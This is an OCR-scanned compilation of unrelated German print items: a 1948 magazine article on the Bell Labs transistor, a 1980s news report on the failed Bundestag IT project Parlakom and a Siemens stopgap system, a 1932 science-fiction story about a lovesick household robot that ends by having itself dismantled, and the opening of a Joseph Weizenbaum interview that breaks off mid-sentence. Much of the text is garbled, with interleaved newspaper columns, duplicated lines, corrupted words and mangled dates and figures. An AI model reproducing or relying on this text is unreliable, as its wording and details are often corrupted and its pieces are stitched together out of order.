tcmpei-aturabl)ängi.ges Verhalten 
Elektrische Stabilität, Robustl^o-^^®^®^ 
Lebensdauer sollen ähnlich sein ^ 
guten Kristalldetektoren, b«| 

Ein stromsteuerndes HalbleitoreJ. | 
kann auch zum Aufbau eines Oszin^® t 
dienen (Abb. 4). In .diesem Pall 
Ein- und Ausgangskneis als - - ' 

Schwingkreise ausgebildet. 

Die erste Vorführung von Tramsüstn 
Elementen und damit ausgestattetej- 
rate fand im Sommer 1948 statt. 

Auf Grund der wenigen bisher veröff^j^|. 
lichten Angaben ist anzunehmen, 
der Transistor in einem ließtirruuten 
Bereich einfacher Eweckbestii-n,Tri,T,np' 
tatsächlich geeignet ist, .die E i 
trernenröhre zu ersetz-ej^ 
Iteineswegs aber überall! Viel wird da¬ 
von abhängen, ob die Stoßempfindiicj^. 
keit gering genug ist, um die 
StabiliUit hinreichend konstant zu halten 
In dieser Hinsicht wird von den 
Laboratorien selbst zugestanden, daß 
Herstellung-sprableme noch nicht voll gg,. 
löst sind. 

Zum ersten Male, seitdem üer olnffj^g.j^g 
Detektorempfänger wopn seiner 
zulänglichen. Leistung in den Hintej-, 
grund gedrängt wurde, l-st jetzt 
röIirenlo.se Hochleustungscmpfängcir 
den Bereich des Möglichen gerückt! 

W. R. 


X«/ 


PUNK-TBCHNIK Nr. 




TRANS 

Der unter diesem Namen von den Bell- 
Laboratorien ln New York eingefiüirte 
Kristall-Verstärker hat äußerst geringe 
räumliche Abmessungen. Er benötigt 
keine Heizstromquelie und hat auch kein 
Vakuum. In den Bereichen, in denen 
diese Haibleitertriode die herkömmlichen 
Elektronenröliren ersetzen kann, bieten 
sich deshalb bei der Verwendung des 
Transistors bestechende Vorteile. So¬ 
fortige BetrlcbsbcrcJ.tschaft ohne Auf- 
heizungsperiode und die etwa 10 bis 
20 mal so lange Lebensdauer wie bei 
normalen Radioröhren sind nur einige 
der Faktoren, die zusammen nut dem 
sclir kleinen Raumbedarf eine Vielzahl 
von Anwendungen ermöglichen. 

Bei der erstmaligen Vorführung dieses 
Transistors wurde ein normaler 10- 
Röhren-Superhet gezeigt, in dem sämt¬ 
liche Röhren durch die Haibieitcr- 
Trlodcn ersetzt waren. In Abb. 5 ist die 
Schaltung eines solchen ,,röhrenlosen“ 
Gerätes skizziert. Man erkennt, daß ein 
derartiger Empfänger außerordentlich 
einfach aufgebaut werden kann, und dör 
deshalb — evtl, auch in Verbindung mit 
„gedruckten" Schaltungen — walir- 
schcinlich zu einem verhältnismäßig 
niediigem .Preis herzustcUen ist. 
Immerhin steht man erst am Beginn 
dieser neuen Entwicklung und vorläufig 


ISTOR 

stellt die bis jetzt erreichte Ausgangs¬ 
leistung von 25 ... 50 mW noch eine ge¬ 
wisse Grenze dar. Es sind jedoch schon 
einige Verstärker aufgebaut worden, die 
zunächst die grundsätzliche Eignung des 
Transistors bewiesen. Femsprechver- 
stärker, Apparate für Schwerhörigen- 
Geräte und Ferasehzwischenverstärker 
wurden mit den entsprechenden Prüf¬ 
geräten durchgemessen und es konnten 
die geringen Vorzcrrungsclgctwchaftcn 
und der — im gegebenen Bereich — 
große Frequenzumfang der Transistor- 
Geräte fcstgestellt werden. 

Abb. 6 gibt einen Größcnvergledch rwi- 
schen einem ZündJiolzbriefclicn und 
einem Transislor-Tongcnerator. Dieser 
Oszillator erfüllt die gleichen Aufgaben 
wie ein entsprechendes Röhrengerät. 
Die ganze Kapsel ist nicht größer als 
ein Röhrensockel und enthält den Tran¬ 
sistor, canen Transformator und je zwei 
Widerstände un4 Kondensatoren. Die 
vier Steckerstifte dienen in bekannter 
Welse zur Verbindung mit den benötig¬ 
ten Batterien und zur Herstellung des 
Masse- sowie Ausgangsansclüusses. 

Ähnlich wie bei einer Elektronenröhre 
läßt sich auch beim Transistor das elek¬ 
trische Verhallen an Hand von Kenn¬ 
linien überseht. Abb. 7 und 8 zeigen 
einige typische Kennliiüenfelder der 


Halbleiter-Triode. Der Eingangsstrom 
durch, den elektfonenlösenden Kontakt A 
i.st näheruhjgsweise durch 

Ie = f (Ue -f- R . Ia) 

b'eaclirieben. Hierin ist R eine von der 
Vorspannung unabhängige Konstante 
und der Ausdruck R • kennzeichnet 
einen Rückkopplungsfaktor, der ggf. 
Unstabilitäten hervorrufen kanntozw. zur 
Anfachung von ungedämpften Schwin¬ 
gungen auszunutzen ist. 

Nach den bis jetzt bekannten Betriebs¬ 
bedingungen wird die Vorspannung 
des elektronentreibenden Kontaktes B 
.so elngastellt, daß sich ein etwa gleich 
großer Strom wie auf der Eingangsseite 
ergibt. U,^ liegt etwa in der Größen¬ 
ordnung von — 45 V, und nach Abb. 8 
ist somit analog zu den Verhältnissen 
bei Elektronenröhren eäne Steilheit von 
ca. 6 mA/V zu definieren. Wie jedoch 
aus dem Keimllnienfcld zu entnelnncn 
ist, hängt die wirksame Steilheit stark 
von den angelegten Spannungen ab, und 
nach den bisherigen Veröffentlichungen 
ist die Verstärkungsregelung durch dne 
Veränderung der geringen, positiven Vor¬ 
spannung weitaus wirksamer als bei den 
normalen Trioden. C. M. 

i, i t e r a t u r h i 11 w c i s ; Physlcal Review 
Juli 19J8; , Audio-Engineoring JulPAugust 

lO'lS; Electronics August 1943; Toute la Radio 
Nr. 128 (Sopt. 1948), S. 258; Radio Craft 
Ed. 19 (Sept. 1948), Nr. 12, S, 24: Wirolcss 
World Bd. 64 (1948), Nr. 10, S, 3,58; Touto la 
Radio Nr. 129 (Old, 1948), S, 289; Radio 
Technik (1948), Nr. 10, S. 505. 



Abb. 6 . Dor Transislor-Tongcnerator im Röhrensoclel 



Abb. 7 (rechts). Gleidislrom-Kennlinienfeld des Iransistors. (Ströme 
vnobhongig variabel, Spannungen abhängig veronderlich.) 
Abb. 8 (links). ,,Statisches“ Kennlinienfeld eines Tronsisfors 



m. b. H., 

monalUch 


clioint mit Genehmigung der franzBstschen Mllltltrroglerung. MonalUch ■> si„rie VeH»,-. ixr„.snr m , n 
.ln. llednUtlon Berlln-Boralgwaldo, Elchborndamni. Tel.: 40 CG «■) bhei V Wedding-Verlag G, 

_irr DM 4.10 (cinschlleOIlch 9 Pf. Postgebühren) zuzUtrlich 8 Pf ^ ^ R 1 n t. Bezugspreis monaiiicn 

r*n^h**'r*rnir'lterlTns durch icjllalboten monatlich koeatert. Bestellungen beim Verinr^ ^ ^ werden inner¬ 
halb Groll Berlins GenehmigungVelVe.?a'ges gllsTaUeT'K^ ä^ckhÄmÄ.^“"'"- """ 


iruNIC-TKOIlNIIC erschoi 
Berlin N 05, MUllcrntr, 

DM 4 —. Bel Postbezug DM 4.10 



















Parlaments-Kommunikation Schach-Matt gesetzt 

Alle Fehler bei Parlakom voll ausgeschöpft 

Von unseren Redakteuren Ralf Kellermann und R. Uwe Proll 


Die Bundestagsabgeordneten werden nun doch bd ihrem Umstieg aus der Postkutsche in den informationstech- 1 '"Stritten. Unstimmigkeiten hatte 
nischen D-Zug einen Zwischenaufenthalt eintegen müssen. Das Scheitern des Pilotprojekles Parlakom ist zwischen den Fraktionen vor 

mittlerweile amtlich bestätigt: in einem internen Rundschreiben hat Bundestagsdirektor Dr. Joseph Bucker die bei der Frage gegeben, ob cs 

Versuchsphase als gescheitert bezeichnet. Dabei war die Verwaltung des Deutschen Bundestages mit grollen einziges Informations- 
Ambitionen gestartet. Parlakom sollte zugleich ein Vorbild herstellerunabhängiger Beschaffung und offener geben 

Systemarchitektur nach dem OSI-Standard werden. Die Leitlinien des Projektes legte eine Studie der ein 

Gesellschaft Für Mathematik und Datenverarbeitung (G MD) fest, die bereits im Vorfeld ein Anforderungsprord Die Frak- 

hinsichtlich Datenschutz und -Sicherheit, Schulung, Leistungsfähigkeit und Qualitätsmcrkmalen des Equip- entschied '^ärnlich 

ments erstellt. Alles wollte man besser als andernorts in der öffentlichen Verwaltung machen, doch das Ergebnis arbeiten auf 
ist am Ende ein Desaster, wie es noch keine Verwaltung alleine fertiggebracht hat. Der de-facto Abbruch der während die CDu7cS^ I 
informationstechnischen (IT) Aufrüstung des Parlaments führte zu allem Überfluß zu neuen Kuriositäten. Der cingeschworen ist ^ ^ ’^Vang 
Haushaltsausschuß beschäftigte sich mit der IT-Schlappe, sperrte dann jedoch allen Bundesressorts vorerst 20% 

derlT-Haushaltsmittel. Gemeint können die Volksvertreter nur ihre eigene Administration und auch sich selbst ging ^ . 

haben, "bestraft’ haben sie nun aber andere, die Bonner Ministerien und den nachgeordnelen Bereich. Beratungsgesellschaff'^" Karl' 

Für sich selbst haben die Haushäl- zwischen dem Wang APC, dem nicht. Ein schlechtes Vorbild für die einer altcrnat^en 

tcr eine Interimslösung von Sic- Ni.xdorf Micro 3 (im WahlkrcisbU- gesamte öffcnlllche Verwaltung, ,™PPe>auch Jv}:, 

mens ins Auge gefaßt (siche hierzu ro) bzw. dem Micro 4 (im Bonner denn alle Parteien weisen tinermüd- einschlägig bekannten' 

eigenständiger Artikel). Für die Büro) oder einem Siemens PC-D. lieh öffentlich auf die Bedeutung, ^^“« ‘'O'nputer Club’ angehör 
Abgeordneten-Kollegen und deren Jeder zweite Abgeordnete wollte der Mitbestimmung bei der Einfüh-j a? zu ganz anderen 

Kommunikation mit der Verwal- Jedoch lieber an einem Siemens rung neuer Technologien hin. Nurr'«''’^®"-empfahlen ein«! 


ter eine Interimslösung von Sic- Ni.xdorf Micro 3 (im Vrahlkrcisbü- 
mens Ins Auge gefaßt (siche hierzu ro) bzw. dem Micro 4 (im Bonner 
eigenständiger Artikel). Für die Büro) oder einem Siemens PC-D. 

Abgeordneten-Kollegen und deren Jeder zweite Abgeordnete wollte 
Kommunikation mit der Verwal- Jedoch lieber an einem Siemens 
lung gehl cs crsimal auf herge- Bürosvstem 5800, einer Nizdorf 
brachte 'Technik zurück: Telefax T'tl#';' ’-C 

und'l'clctex. Die Bundespost - mo- ' 

dernistischen Vokabeln bedeuten nA" •' ^ 

einfach l-'crnkopierer und clektro- j 

iscli aufgcniülzer Imrrisrhreiber 

;el). Helfen soll eines Tages das x- 1 

-DO l’rotükoll, eine Software-gc- 
. .ützte Kompntibililät.srcgclungj'ür |, 

Jeriilc verscliiedcncr Hersteller, ™ . 

iiiit deren Betrieb frühestens Mitte 

1989 zu rechnen ist. Bll lli I fI W&. 

Für die meisten zu Beginn gestarte- Abgeordnete auf der EDy-Schidba 
len 17 Inleres.senten kam jedoch des Bundestages, frri Bild vorne rechts Dr. Beier Milz.scherling (SI’D 
bercils nach einer ersten Sichtung Berlin) und hinten links Karsten Vogl (Frankfurt). 
der Angebote aufgrund mangeln- gg^Q Konfiguration oder einer die SPD zog spater mit einer 
der Qualilät.s-und Leistungsmerk- v/ang U.S 65 Anlage arbeiten. Ganz ’Dicnstvcrcinbarung’ nach, aller- 
malc das vorzeitige Aus. Lediglich glücklich wurden die parlamenlari- dings erst nachdem die Mitarbeiter 
Nixdorf, Wang und Siemens konn- sehen Tester jedoch nicht mit ihren im Dezember 1986 eine Art Streik 
ten sowohl staiid-aloiie PCs al.s „cuen Arbeitshilfen. Das Nixdorf orttanisiert hatten. 

auch ein Mchrplatzsyslcm im Bun- --- 

destag plazieren. Die Parlamcnta- ft 
rier hatten daher nur noch die Wahl 5 


dic Grünen hatten bereits im Vor-i"^ ^‘^'y'u'unikationseinheitf,^*^^*'" 

Fraktionen mit eigene,« 

eigener Netzkonirolle aus 

„ Umstritten war das 

a J'' Grünen 

von den kritischen Selbst 

^ sung akzeptiert, verzichtete 

Ml ‘eiEndeI986 ganzaufdieTw*''''‘- 


Vor allem aber das 

privatwirtschaftlichen 


K'^nzept der 


Abgeordnete auf der FDV-Schuihank im Farlakom-Schuiungszenlnim '^ung durch die ADV-Orga 


Ins Dr. Beter Mitz.scheriing (SBD ^ b'uehte. Offensichtlich ® 
t (Frankfurt). Volksvertreter «t u' 

j. cdtv ■■ mit dem notwendigen Ernst h,.- . 

die SPD zog spater mit Sache. Die Kosten werden i * 

Dienstvereinbarung nae . aller-die beteiligten Unternehmen 
ding^s erst nachdem die Mitarbeiter auch die Bundestagsverwaltun» 


im Dezember 1986 eine Art Streik 


organisiert hatten. 


. ter der Rubrik Erkenntnis 
eben müssen. 


verbu. 




HAI 



« , , , , , . ,, Zauberwort im Hohen R,. 

Auch der unabhängige Daten-heißt „un x-400 Protokoll 
schmzbeauftragte. den die Kom-Software-Lösung, von der man 

mission des Ältestenrates empfoh- Wunder erhofft, ist in der 

len hatte, blicb lediglich ein Kommunikation unterschiedUnL 

Wunsch. Mankonntcsich nicht auf Systeme zu gewährleisten. 

die notwendigen Kontroll- und Problem: die internationalen 

Entscheidungsbefugnisse sowie mierungsgremien formulieren n«, 
über die Personalausstattung cini- bis mindestens Herbst 1988 
gen. Stattdessen wurde ein Daten- neuen Standard. Dann erst Wer^^*** 
Schutzgremium eingesetzt, dem ne- die Hardware-Produzenten Gerj^"^ 
ben je einem Vertreter der beteilig- umstellen und liefern können, 
ten Fraktionen ein Mitglied der wird also noch dauern bis ' 
Bundesverwaltung angehört. Auch MdB’s auf die mittlerweile sch«^ 
die gesamte Konzeption des offe- beliebten Schachspiele und pj 
nen Netzes war von Anfang an Zeugsimulationen Zugriff Erhaltg^ 


Welt-Centrum Büro 

16 . - 23 



m 


„Parlakom ist gescheitert", so Bun¬ 
destags-Direktor Dr. Jo.seph Bü¬ 
cher im Rundschreiben. Hier mit 
Präsident Philipp Jerminger. Foto: 











Interimslösung für Haushaltausschuß 
Siemens vermietet Provisorium 

BS/rup) Offiziell als Bestandteil von Parlakom — wenn er Versuch des 
Parlaments elektronisch zu kommunizieren auch vorerst suspendiert ist 
— hat Siemens es geschafft dem Haushaltsausschuß eine provisorische 
Kommunikationseinrichtung zu verkaufen. Jährlich fallen hierfür 
130.000 DM zuzüglich für Personalkosten 190.000 DM an. Damit der 
HaushaltsausschuB aber auch die Haushaltsreferate der einzelnen Res¬ 
sorts erreichen kann, müssen diese mit weiteren Kosten von fas einer 
iulben Million Mark rechnen. Vorgesehen ist, daß der Haushaltsaus- 
ichuß die Tagesordnung in die einzelnen Büros der Haushälter elektro¬ 
nisch versenden kann. Der Rest der Kommunikation zwischen Bundesmi- 
nislerien, insbesondere dem Bundesfinanzministerium, dem Bundesfi¬ 
nanzamt sowie dem Bundestag und denWahlkreisbUros der Abgeordne¬ 
ten soll mit Teletex der Bundespost erledigt werden (siehe hierzu 
»esonderten Artikel). 



ordneienhochhauses ein Benutzer 
Service Zentrum eingerichtet ha¬ 
ben, beheben helfen. Bei einem Be¬ 
such in den Büros schauten sie den 
Parlamentariern auch schon mal 
bei der täglichen Arbeit über die 
Schulter, um vor Ort erste Hilfe zu 
leisten. Anwendertreffen und die 
hausinternen BSZ-News dienten 
dem Erfahrungsaustausch. Aufge¬ 
sucht wurde das Benutzerzentrura 
durch MdB’s und Mitarbeiter je¬ 
doch kaum. Auch von Firmen zu¬ 
sätzlich eingerichtete Vorführ-ln- 
stallationen in umliegenden Woh¬ 
nungen und Büros blieben leer. Die 


Leitung des IT-Versuchs oblag zu¬ 
dem Germanisten und Politologen. 
DV-Fachleute und Mitarbeiter des 
hauseigenen wissenschaftlichen 
Dienstes — der den MdB’s in Zu¬ 
kunft per EDV zuarbeiten sollten 
— waren nicht beteiligt. Auch die 
Vorsitzende des mit dem IT-Kon- 
zept bescliäftigtcn Ältestenrates, 
spöttiscli nur Tripplc-S’ genannt, 
konnte die Interessengegensätze 
nicht begleichen. Sie selbst mußte 
sich sogar Vorwürfen wegen per¬ 
sönlicher Interessenkonflikte stel¬ 
len, da auch ihr Mann für die GMD 
mit Parlakom beruflich zu tun hat¬ 
te. 


Vueh die Ressorts müssen kräftig 
lachrüsten, denn im Regelfälle ver- 
ügen die Bonner Ministerien je- 
veils nur über einen Teletex-An- 
chluß. bis Juni soll hier nachge- 
chafft werden. Verschlußsachen 
Verden von dieser Kommunikation 
tusgeschlossen. 

Das schmale Ziel dieses Proviso- 
iums soll sein, daß die Mitglieder 
les Haushaltsausschusses sowohl 
tuf ihrem Bonner- wie auch ihrem 
Vahlkreisbüro über Datex-P-Lei- 
ungen mit ihrem Tcletex-Gerät die 
Vusschußunter lagen, Protokolle, 
Beschlüsse und Tagesordnungen 
ibrufen können, die in der Siemens 
äS-2000-Anlage gespeichert sind. 
\us dem Bundcsinnenminislerium 
vird eine gewisse Skepsis gegen- 
iber dieser Lösung nicht geleugnet, 
lenn das Fehlen jeglicher Recher- 
:hicrmöglichkeit und das gleichzei- 
■ig recht umständliche Kommuni- 
tationsverfahren über Teletex las- 
:en eine wirkliche ausschußgerech- 
c Nutzung dieser Angelegenheit als 
caum wahrscheinlich erscheinen. 
\usgehend von der Aufgabe eines 
Taushaltsausschuß-Mitgliedes, 
tonnte eine vernünftige Datenver- 
irbcitung nur dahingehend atisse- 
len: Bundcstagscigcncr Großrech- 
ler, der genügend Kapazitäten hat, 
jm nicht nur den aktuellen, son- 
Icrn auch die Bundeshaushalte der 
elzten Jahre sowie die Landes- 
»aushalle zu speichern. Zur Kon- 
rollc der Subventionspolitik der 
Bundesregierung braucht jeder 


Software Paket Nios-Top konnte 
nicht störungsfrei auf dem Micro 
PC implementiert werden. Auf dem 
Wang APC unter Wang MS-Dos 
und XENIX konnten trotz Emula¬ 
tionskarte nicht alle Programme 
zum Laufen gebracht werden und 
die So-Schnittstelle für den OSI- 
Slandard war nicht kompatibel. 
Aufirctende Probleme bei der Ar¬ 
beit sollten die Fachleute der ADV- 
Orga, die im 11. Stock des Abge- 


Haushälter Einsicht in die Landes¬ 
haushalte, Zur Verschiebung von 
Ausgabeposten muß er Einblick in 
alle Einzelheiten haben können und 
dies auch rückwirkend. Nur ein 
großes weh platzfähiges System für 
den Ausschuß angeschlossen an 
den Großrechner wäre sinnvoll. 
Mit der jetzigen Lösung ist zwar 
eine luxeriöse Bequemlichkeit und 
ein weiteres Imponiergerät in den 
Abgeordneten-Büros sicher, doch 
gleichzeitig eine nur passive Nut¬ 
zung eines geringen Information¬ 
angebotes möglich. 

Einfacher hat da der Forschungs¬ 
ausschuß des Bundestages, dessen 
Mitglieder vom gleichen Hersteller 
PC’s zur Verfügung gestellt bekom¬ 
men haben. Abgeordnete anderer 
Ausschüsse vermuten schon, der 
große Siibventionsempfenger in 
Sachen Mega-Bit-Chip Entwick¬ 
lung der die Sieuergelder letztlichh 
nicht zur deutschen Entwicklung 
sondern zum japanischen Lizenz¬ 
kauf nutze — habe den For- 
schungsausschußmitgliedcrn die 
Geräte deswegen kostenlos zur Ver¬ 
fügung gestellt, damit diese den 
Weg der Subventionsmillionen im 
Konzern be.sser verfolgen könnten. 
Die Sache hatte bereits Kreise gezo¬ 
gen, da Bundestagspriisident 
Philipp Jenningcr Ende letzten 
Jahres in einem Brief an die Abge¬ 
ordneten ausdrücklich darauf hin¬ 
wies, daß nur Geldspenden in der 
Steuererklärung angegeben werden 
müßten. 


Die Mitarbeiter der Abgeordneten 
waren weniger erfpeut über die neue 
Technik am Arbeitsplatz, denn für 
sie setzt sich weder der Personalrat 
des Bundestages noch derjenige der 
Fraktion ein. Sie haben nämlich 
alle privatrechiliche Verträge mit 
’ihrem’ Abgeordneten. Einen ar¬ 
beitsrechtlichen Status und damit 
ein Mitbestimmungsrecht gibt es 
feld eine ’Betriebsvereinbarung’ mit 
ihren Mitarbeitern abgeschlossen, -.. 



ABGEORDNETE AUF DRAHT: Die Mitglieder des Deutschen Bundestages — gleich 
welcher Couleur — werden in Zukunft alle dieselben .Informationskanäle* haben; ein 
weltweit beispielhaftes InformatlonB- und Kommunikationssystem soll demnächst in 
einheitlicher Technik alle 530 Abgeordneten, die Ausschüsse, Fraktionen, wissen¬ 
schaftliche Dienste und die Bundestagsverwaltung miteinander verbinden. Über die 
.Nervenstränge* des Systems, das in den nächsten zwei Jahren aufgebaut werden soll, 
gehen gleichormaSen Sprache. Text, Bild und Daten nach dem künftigen internationa¬ 
len Fernmeidastandard ISDN (Integrated Services Digital Network). Das Kommunika¬ 
tionssystem Hicom, das diese Infrastruktur zur Verfügung stellt, vermittelt auch den 
Zugang zu Oatenbariken, zu einem internen Btx-Infonmatlonssystem und enthält elek¬ 
tronische .Briefkästen* für hinterlegte Text- und Sprachinformationen. Ob ds® Projekt 
.Parlakom* die Kommunikation der Parlamentarier untereinander verbessert, ist offen. 
Entscheidend ist. daß das geplante System mit einem .offenen* Industriestandard 
(OSI) den Anschluß von Geräten verschiedener Hersteller zuläßt. Neben dem Telefon 
sind es vor allem Personalcomputer und Bürosysteme für die Text- und Datenkommu¬ 
nikation oder auch .multifunktionale* Geräte, die — mit Tastatur, Bildschirm und Tele¬ 
fonhörer — für sämtliche Kommunikatlonsarten einzusetzen sind. Die Abgeordneten, 
Fraktionen und Ausschüsse können sich also entsprechend Ihren eigenen Vorstellun¬ 
gen zusätzlich technisch ausstatten. Eine praktische Unterweisung der verschiedenen 
Möglichkeiten führt der Hersteller bereits jetzt in seinem Bonner Fachberaterzentrum 
durch. PR3-2-J? (FR-Blld: Siemens) 



Hilfe, unser Roboter ist 
liebeskrank! 


Er massiert die Hausfrau. Er trinkt den 
Cognac des Ehemannes. Er versucht die 
Witwe Lumidatsch im Treppenhaus zu küs¬ 
sen. Und schließlich wird erlebensmüde. — 
Eine sentimentale Science-fiction-story, von 
uns leicht gekürzt, die Friedrich Kroner 
schon 1932 ersann ., ^ 


2 

W ' ir harten jahrelang einen 
sogenannten Fußboden- 
Roboter gehabt, ein klei¬ 
nes, murksiges Ding. Er kehrte 
den Boden, wusch ab, kochte ganz 
gut und half meiner Frau auch mal 
beim Anziehen. Aber er war acht 
Jahre alt, und er schnaufte doch 
schon stark, und es rasselte in sei¬ 
nen Gelenken, Ehe man so einen 
Roboter zum Überholen in die Fa¬ 
brik schickt, dann schon lieber 
weg! Wir kauften uns also einen 
neuen Roboter, einen Superfix. 
Als er nach dem Kauf in unserer 
Wohnung ankam und kaum drei 
Atemzüge getan hatte, sagte er 
schon ün mißbilligendem Ton; 
„Staub, viel Staub.“ Er sah sich 
kopfschüttelnd in der Küche um, 
machte sofort das Fenster auf und 
setzte den Ventilator in Gang, 
dann lüftete er den Deckel des 
Mülleimers und sagte mit der Stim¬ 
me in Moll: „Schweinerei!“ Wir 
ließen ihn in der Küche zurück. 
Meine Frau gab ihm Anweisungen 
für den nächsten Tag. 

Er funktionierte aber wirklich ganz 
hervorragend. Vor allem hatte die¬ 
ses schreckliche Rasseln und Keu¬ 
chen in der Wohnung aufgehört. 
Es wurden keine Türen mehr ge¬ 
worfen. Die ganze'Arbeit ging mit 
einer Präzision und Geräuschlosig¬ 
keit vor sich, daß man manchmal 
verwundert daneben stand und 
staunte. Und als Masseur war er 
große Klasse. Meine Frau war rest¬ 
los begeistert! 

Auch ich war mit ihm sehr zufrie¬ 
den. Er staubte meine Bibliothek, 
die über 2000 Bände enthält, mit 
einer Akkuratesse und Schnellig¬ 
keit ab, wie kein Mensch es imstan¬ 
de gewesen wäre. Aber nach eini¬ 
gen Monaten merkte ich den 
Grund für seine Leidenschaft, in 
meinem Zimmer aufzuräumen. 
Eines Abends, als wir aus dem 
Theater nach Hause kamen, lag er 
total betrunken, man kann schon 
sagen, sinnlos betrunken, im Klub¬ 
sessel, eine völlig geleerte Kognak¬ 
flasche neben sich. Wir telefonier¬ 
ten noch in derselben Nacht mit 
dem Arzt, ich wollte sagen, Inge¬ 
nieur. Er kam auch, besah sich den 





Schaden und fand schließlich einen 
Defekt in der oberen rechten 
Schulterkammer. Ein kleiner, win¬ 
ziger Draht hatte sich aus dem 
Kontakt zur Kopfschaltung gelok- 
kert, und damit schien der Schaden 
beseitigt. Zwölf Stunden lag unser 
Roboter wie ein Toter und pumpte 
seinen Raitsch aus. Dann machte 
er wieder seinen Dienst so gewis¬ 
senhaft wie vorher. Aber acht Ta¬ 
ge später, an einem Sonntagnach¬ 
mittag, als unser Roboter seinen 
Ausgang hatte, war er in ein Tanz¬ 
lokal eingedrungen, obwohl den 
Robotern der Eintritt in alle öf¬ 
fentlichen Lokale streng verboten 
war, hatte dort ein junges Mäd¬ 
chen einfach um die Hüfte genom¬ 
men und mit ihr zu tanzen begon¬ 
nen, dabei hatte er fünf Personen 
umgeworfen sowie einen Tisch mit 
vier Tassen Kaffee und drei Tor¬ 
ten, die wir samt dem Geschirr 
bezahlen mußten. Wir waren ge¬ 
zwungen, ihn am anderen Morgen 
von der Polizei abzuholen. 

Als wir unseren Roboter von der 
Polizei herausbekommen hatten, 
gab es eine sehr ernsthafte Ausein¬ 
andersetzung mit ihm. Meine Frau 
nahm ihn ins Gebet. „Julius“, sag¬ 
te sie, „du bist so klug, du hast so 
gute Manieren, weiß der Himmel, 
wenn die Fabrik imstande wäre. 


Meine Frau sah mich an, ich sah 
meine Frau an. Der Roboter blieb 
im Sessel sitzen, starrte uns mit 
Dänen in den Augen an und sagte: 
„Sie wohnt nicht hier im Haus. “ 

deine Fehler abzustellen, wir wür¬ 
den dich wie ein Kind ira Hause 
halten.“ Solche Redensarten nutz¬ 
ten natürlich gar nichts. Julius ver¬ 
sprach, gelobte Besserung. Und 
cfie nächsten 14 Tage saß er auch, 
wenn er nichts zu tun hatte, nach¬ 
denklich und still auf dem Küchen¬ 
stuhl und starrte zur Decke. 
Schließlich dachte ich, schicke ihn 
doch mal zum Psychoanalytiker. 
Vielleicht findet der einen Kom¬ 
plex, den sein Ingenieur in ihn 
hineingebaut hat. Ich schrieb an 
die Fabrik einen energischen 
Brief, ich zählte alle Zwischenfälle 
mit Julius auf. Das Ergebnis war, 
daß der Chefingenieur kam, der 
Julius 14 Tage vorher überprüft 
hatte, Julius erkannte ihn auch so^ 
fort wieder. Er fiel ihm um den 
Hals und begann zu weinen. Es 
war eine peinliche Situation. Der 
Chefingenieur entschuldigte sich, 
schrie ihn an und befahl ihm, sich 
auf die Chaiselongue zu legen. 
Dann begann er ihn abzuklopfen 
und abzuhorchen, schaltete jede 
Brustkammer einzeln aus, ja, 
schließlich öffnete er sogar die 
Kopfkamraer, Plötzlich schrie er 
überrascht. „Ah!“ und holte mit 
einer Pinzette eine mikroskopisch 
kleine Spirale heraus, die sich viel¬ 
leicht gelockert hatte oder gar 


nicht hineingehörte, dei^ er warf 
sie einfach in den Papierkorb. In 
Ordnung“, sagte er und-schaltetc 
Julius wieder zu. Auch. Julius 
schien zufrieden. Er saß aufrecht 
starrte seinen Konstrukteuj- jjjjJ 
verklärten Augen an: „Besser; viel 
besser“ - „Na also“, sagte der 
Chefingenieur und ging. 

Von diesem Tag an war Julius wie 
verwandelt. Er tat zwar seine Ar¬ 
beit gewissenhaft und geräuschlos 
weiter, aber sein Blick war abwe¬ 
send. Meine Frau, mit denj Tn. 
stinkt ihres Geschlechts, fragte ihe 
besorgt: „Ist dir etwas, Julius"?“ - 
„Oh, nichts, gnädige Frau“ 'flii! 
Sterte er und blickte verklärt rar 
Decke. ™ 

Eines Tages überraschten -wir Ju- 
lius: In einem Sessel sitzend »jn 
Buch in der Hand, Tränen in 
Augen und Verse gegen die DeSe 
flüsternd, die er auswendig 
Es waren Liebesgedichte. 
sah und hörte uns nicht. Wir « * 
den sprachlos in der Tür. s: w- 
Bescherung. Wir hatten “ 

mal, ich weiß nicht, ob ir-K ^ 
erwähnt habe, vor zwei * 

der Witwe Lumidatsch eine S 

zahlen müssen, weil unser v r 

rfe auf dem Treppenabsatz 

Tadle gefaßt und versucht^^* 
sie abzuküssen. hatte,;.. 

Meme Frau sah mich an iot, 

meine Frau an. Der Roboter Kril - 
un Sessel sitzen, starrte hlielJ p 

Tranenmden Aueenani, 

Angst sh? i 
mcht hier im Haus “ ® ® '^ohnt 1 

Wir lagen die ganze Nacht I 
los und besprachen die schlaf-1 
wir aufwachten, war e^^'^he. Alst 
mittags. Kein Frühstück^^'^ Ul» I 
ne summende Kaffeema, r I 
schweige die Meldung- 8«* 

stück ist angerichtet “ v ^rüh- 
in der Küche. Die 
Korridortür waren dur^®* 
Briefschlitz nach innen h?** <1®® I 
warfen Wir hätten uns 
gemacht, wenn wir in den 
gen inseriert hätten: „Julius 
zuruck. * 

Den wirklichen Grund, wan,.., „ 
hus uns verließ, haben 
geahnt: Er war lebensüberdr.-"**** - 
Er suchte seinem Leben ein r 1 
zu machen, und wie raffinip 
vorging, wie er die An des ** 
mordes überdacht haben muß u 
weist sein Ende, das wir auc’ ^ 
Zeitung erfuhren. 

Julius war der vollkommenste 
boter, der jemals gelebt hat 
ging in eine Eisenwarenhaudi, - 

und verlangte ein Dutzend ^hj^8 * 
benzieher und Schraubens«^^'** 
sei. Damit ging er auf einen 
derspielplatz im Park, setzte 
unter eine Gruppe halbenvach*** 
ncr Lümmels und sagte: „Juj,^*. 
mir ist nicht ganz gut, seht h-S’ 
mal nach, was mir fehlt.“ 

Nach dem Bericht der Zeitun» r, 
es keine Stunde gedauert, bis 
eine Schraube mehr an unse,i”l 
Julius in ihrem Gewinde saß. 


I 





Joseph Weizenbaum: 

“Die Technik in die Schranken weisen” 

Der Weg ist das Ziel! / Ein Interview 





Im deutschen Sprachraum wurde Joseph Weizenbaum (geboren 1923 in Berlin, 1936 emigriert in die; 
USA, Professor für Informatik am Massachusetts Institute for Technology, MJ.T.) bekannt durch 
seine Bücher “Die Macht der Computer und die Ohnmacht der Vernunft” (Frankfurt 1977) und 
“Kurs auf den Eisberg” (Zürich 1984). Unermüdlich weist Weizenbaum auf die Grenzen der Techno¬ 
logie hin und warnt vor der Gefahr, die sich aus einer ungebremsten Entwicklung von Wissenschaft 
und Technik ergeben kann. — Im nachfolgenden Gespräch geht es um das historische, kulturelle und 
soziale Umfeld einer Zivilisationsentwicklung, die in der elektronischen Datenverarbeitung einen Kul¬ 
minationspunkt erreicht. Das Gespräch führte Markus Schmidt; es fand im Haus der Familie Dom- 
